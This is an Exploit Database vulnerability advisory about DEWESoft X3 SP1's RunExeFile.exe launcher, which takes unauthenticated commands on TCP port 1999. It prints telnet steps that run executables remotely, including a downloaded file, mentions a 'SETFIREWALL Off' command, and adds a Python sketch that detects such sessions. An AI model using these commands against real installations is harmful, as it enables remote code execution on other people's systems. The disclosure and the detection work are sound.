Exploit Database

[+] Credits: John Page (aka hyp3rlinx)
[+] Website: hyp3rlinx.altervista.org
[+] Source: http://hyp3rlinx.altervista.org/advisories/DEWESOFT-X3-REMOTE-INTERNAL-COMMAND-ACCESS.txt
[+] ISR: Apparition Security 
DEWESoft X3 SP1 (64-bit) installer - X3
Vulnerability Type:
Remote Internal Command Access
CVE Reference:
Security Issue:
The installer for DEWESoft X3 SP1 (64-bit) devices, specifically the "RunExeFile.exe" component, does not require authentication
for sessions on TCP port 1999. This allows remote attackers to execute arbitrary code or access internal commands, as demonstrated by a
RUN command that can launch an .EXE file located at an arbitrary directory location, download an .EXE from an external URL, or run
a "SETFIREWALL Off" command.
The RunExeFile.exe "Launcher" is located at "C:\Program Files (x86)\Common Files\DEWESoft Shared\" after installing using the full-install.
Internal commands used by "RunExeFile.exe" for which I could not find any documentation.
TELNET x.x.x.x 1999 
RUN calc.exe
Launch the victim's browser and send them to a website for a drive-by download, etc.
TELNET x.x.x.x 1999 
Then, from the TELNET session, execute it from the Downloads directory.
runexe c:\Users\victim\Downloads\DOOM.exe
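
Detection sketch for the behaviour described above (an added example, not part of the original advisory): it flags non-loopback inbound connections to RunExeFile.exe on TCP 1999 and ties any process the launcher starts to a recent remote session. The record layout follows Sysmon's NetworkConnect (Event ID 3) and ProcessCreate (Event ID 1) field names; the host name, addresses, timestamps and the 60-second window are assumptions, and the sample events are constructed.

```python
import ipaddress
from datetime import datetime, timedelta

LAUNCHER = "runexefile.exe"      # component named in the advisory
PORT = 1999                      # unauthenticated TCP port named in the advisory
WINDOW = timedelta(seconds=60)   # assumed correlation window, tune per site

def is_launcher(path):
    return path.lower().rsplit("\\", 1)[-1] == LAUNCHER

def ts(ev):
    return datetime.fromisoformat(ev["UtcTime"])

def find_alerts(events):
    """Return (severity, host, remote_ip, child_image) tuples in time order."""
    alerts, sessions = [], []
    for ev in sorted(events, key=ts):
        if (ev["EventID"] == 3 and is_launcher(ev["Image"])
                and ev["DestinationPort"] == PORT and not ev["Initiated"]):
            src = ipaddress.ip_address(ev["SourceIp"])
            if src.is_loopback:
                continue  # local use of the launcher, not network exposure
            sessions.append((ev["Computer"], str(src), ts(ev)))
            alerts.append(("medium", ev["Computer"], str(src), None))
        elif ev["EventID"] == 1 and is_launcher(ev["ParentImage"]):
            # A process started by the launcher: tie it to a recent remote session.
            hit = next((s for s in reversed(sessions) if s[0] == ev["Computer"]
                        and timedelta(0) <= ts(ev) - s[2] <= WINDOW), None)
            alerts.append(("high", ev["Computer"], hit[1], ev["Image"]) if hit
                          else ("low", ev["Computer"], None, ev["Image"]))
    return alerts

EXE = r"C:\Program Files (x86)\Common Files\DEWESoft Shared\RunExeFile.exe"
SAMPLE_EVENTS = [  # constructed records, not captured logs
    {"EventID": 3, "UtcTime": "2018-03-10 10:00:00.000", "Computer": "LAB-DAQ01",
     "Image": EXE, "SourceIp": "192.0.2.10", "DestinationPort": 1999, "Initiated": False},
    {"EventID": 1, "UtcTime": "2018-03-10 10:00:05.000", "Computer": "LAB-DAQ01",
     "Image": r"C:\Windows\System32\calc.exe", "ParentImage": EXE},
    {"EventID": 3, "UtcTime": "2018-03-10 11:00:00.000", "Computer": "LAB-DAQ01",
     "Image": EXE, "SourceIp": "127.0.0.1", "DestinationPort": 1999, "Initiated": False},
    {"EventID": 1, "UtcTime": "2018-03-10 12:00:00.000", "Computer": "LAB-DAQ01",
     "Image": r"C:\Windows\System32\notepad.exe", "ParentImage": EXE},
]

if __name__ == "__main__":
    for alert in find_alerts(SAMPLE_EVENTS):
        print(alert)
```

A "high" result means a child process appeared within the window after a remote session on port 1999; "low" marks launcher activity with no matching remote session.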
Network Access:
Disclosure Timeline:
Vendor Notification: February 9, 2018
Vendor "thank you for the warning. We will forward this to the developers and they will look into it" : February 19, 2018
Inform vendor of disclosure timeline : February 19, 2018
No further replies, update or addressing of the issue by vendor.
Vendor "We will assume that this issue is resolved and close the ticket." : March 6, 2018
March 10, 2018 : Public Disclosure
[+] Disclaimer
The information contained within this advisory is supplied "as-is" with no warranties or guarantees of fitness of use or otherwise.
Permission is hereby granted for the redistribution of this advisory, provided that it is not altered except by reformatting it, and
that due credit is given. Permission is explicitly given for insertion in vulnerability databases and similar, provided that due credit
is given to the author. The author is not responsible for any misuse of the information contained herein and accepts no responsibility
for any damage caused by the use or misuse of this information. The author prohibits any malicious use of security related information
or exploits by the author or elsewhere. All content (c).
